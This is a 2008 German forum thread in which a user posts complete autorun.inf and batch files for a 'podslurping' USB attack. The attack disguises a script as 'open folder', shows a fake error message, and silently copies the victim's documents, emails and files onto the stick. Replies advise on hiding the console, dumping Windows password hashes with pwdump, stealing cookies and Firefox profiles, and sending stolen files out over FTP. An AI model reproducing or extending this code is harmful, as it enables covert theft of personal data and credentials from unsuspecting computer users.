[Java] Batch-Datei Hilfe (podslurping)

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von 2drift, 19. September 2008 .

Schlagworte:
  1. 19. September 2008
    Batch-Datei Hilfe (podslurping)

    hallo,

    ich hab mir eine Batch podslurping datei erstellt und habe dazu ein paar fragen.

    dafür hab ich in ein textdokument geschrieben:


    Code:
    [autorun]
icon=FOLDER.ICO
open=start.bat
action=Ordner öffnen, um Inhalte anzuzeigen
shell\open\command=start.bat
    und das ganze unter autorun.inf gespeichert
    Dann hab ich in ein neues Textdokument

    Code:
    @echo off

@start /min new_document.bat /B

@exit
    geschrieben und unter start.bat gespeichert.
    Zum Schluss hab ich in ein 3. Textdokument

    Code:
    @echo off
echo Unbekannter Fehler aufgetreten
mkdir %~d0\Anderes
mkdir %~d0\Anderes\%computername%
mkdir %~d0\Anderes\%username%
xcopy "C:\Eigene Dateien\*.doc" %~d0\Anderes\%username% /s/c/q/r/h
xcopy "C:\Eigene Dateien\*.xls" %~d0\Anderes\%username% /s/c/q/r/h
xcopy "C:\Eigene Dateien\*.eml" %~d0\Anderes\%username% /s/c/q/r/h
xcopy "C:\Eigene Dateien\*.ppt" %~d0\Anderes\%username% /s/c/q/r/h
xcopy "C:\Dokumente und Einstllungen\*.pdf" %~d0\Anderes\%computername% /s/c/q/r/h
xcopy "C:\Dokumente und Einstllungen\*.zip" %~d0\Anderes\%computername% /s/c/q/r/h
xcopy "C:\Dokumente und Einstllungen\*.jpx" %~d0\Anderes\%computername% /s/c/q/r/h
xcopy "C:\Dokumente und Einstllungen\*.exe" %~d0\Anderes\%computername% /s/c/q/r/h
xcopy "C:\Dokumente und Einstllungen\*.txt" %~d0\Anderes\%computername% /s/c/q/r/h
xcopy "C:\Dokumente und Einstllungen\*.bat" %~d0\Anderes\%computername% /s/c/q/r/h
@cls
@exit
    geschrieben. Zusätzlich habe ich noch ein icon, das FOLDER.ICO heißt auf den usb stick kopiert.
    Das heißt, wenn man den usb stick einsteckt kommt ja die melung "Wechseldatenträger". Darin steht dann an erster Stelle "Ordner öffnen, um Inhalte anzuzeigen" mit dem Icon folder.ico daneben. Wenn man darauf klickt, öffnet sich aber nicht der ordner sondern die datei start.bat
    Die öffnet dann minimiert new_document.bat und schließt sich wieder (blitzt nur auf)
    Diese wiederum ist leer (durch @echo off) und zeigt nur "Unbekannter Fehler aufgetreten an"
    das stimmt natürlich nicht (nur zur ablenkung).
    in wirklichkeit erstellt die datei 3 Ordner auf dem stick (nämlich "anderes" und darin zwei neue ordner, die nach dem Benutzernamen, bzw. dem Computernamen benannt sind)
    Dann kopiert die Datei aus "eigene Dateien" nacheinander erst worddokumente, dann exeldokumente, dann e-mails und zum schluss powerpointdokumente in diese ordner.
    Danach kopiert die Datei aus "Dokumente und Einstellungen" die pdf dateien, zip dateien, usw in diese ordner. zum Schluss schließt sich die datei.


    Nun zu meinen Fragen:
    Kann man das so einstellen, dass die datei "new_document.bat" nur als prozess angezeigt wird, nicht minimiert?
    Im Fenster "Wechseldatenträger" steht ja dann 2mal "Ordner öffnen, um Inhalte anzuzeigen" (einmal die autorun.inf, die ausgeführt wird und einmal das richtige, mit dem wirklich der ordner geöffnet wird). Kann man das richtige iwie unterdrücken?
    Zum Schluss möchte ich noch wissen, wo die wichtigen daten auf der festplatte gespeichert sind (passwörter, und sonstige interessanten Daten).
     
    + Multi-Zitat Zitieren
  3. 22. September 2008
    AW: Batch-Datei Hilfe (podslurping)

    also zu den wichtigen daten

    Du könntest pwdump einbauen das holt sich die Windows Hashes die du cracken kannst.
    Wichtig ist erstmal zuwissen was du überhaupt "stealen" willst. Du könntest z.B. auch cookies stealen. Oder per commands nach bestimmten Datein suchen. Aber sone batch ist eig schon fast sinnlos. Wenn du Passwörter abziehen willst informier dich wo bestimmte Programme und Dienste ihre configuration/pw files verstecken. Naja du musst ja aber immernoch direkten Zugang zu dem PC haben. Und wenn man das schon hat und eh böse Absichten hat würde es genau so ein trojaner tun. Aber psst Trojaner sind böse. ^^
     
    + Multi-Zitat Zitieren
  4. 22. September 2008
    AW: Batch-Datei Hilfe (podslurping)

    Mit der berühmten hidden.exe (auch hidden32.exe oder hiderun.exe genannt), diese exe versteckt das konsolen fenster. Findet man via google.
    der aufruf wäre dann:
    start hidden.exe batch.bat

    nein. Mach das Zeug doch einfach in einen versteckten ordner rein, die meisten windows nutzer haben "versteckte ordner und dateien anzeigen" sowieso deaktiviert. Oder du setzt die einstellung selber:
    Show Hidden Folders and Files at Registry Guide for Windows

    Finde es selber heraus oder benutzte, wie fast jedes scriptkiddie, die tools von NirSoft - freeware utilities: password recovery, system utilities, desktop utilities
     
    + Multi-Zitat Zitieren
  5. 23. September 2008
    AW: Batch-Datei Hilfe (podslurping)

    also ich möchte eig überwiegend passwörter stealen (wer aber ne idee hat, was man sonst noch interessantes stealen kann, soll das ruhig sagen)
    was kann man denn aus cookies lesen?
     
    + Multi-Zitat Zitieren
  6. 24. September 2008
    AW: Batch-Datei Hilfe (podslurping)

    aus den cookies kannst du den login für bestimtme websites auslesen.
    ok wenn du schon die böse absicht hast pws zu stealen kannst du genau so ein kiddiestealer benutzen. da sparst du dir jede menge arbeit.
     
    + Multi-Zitat Zitieren
  7. 24. September 2008
    AW: Batch-Datei Hilfe (podslurping)

    ich hab mir da vor nem halben jahr auch mal was gebaut !

    Werde mal meinen quellcode hier einstellen wenn ich daheim bin !

    Zum passwörter stealen habe ich mir immer den kompletten ff ordner kopieren lassen und falls ich noch neue tools installen wollte habe ich noch nen ftp bat gebastelt der mir dann auch immer schön die files zusendet und die vorher alle zip und so weiter..... ich upp gleich mal den quellcode.
     
    + Multi-Zitat Zitieren
  8. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.

Auf dieses Thema antworten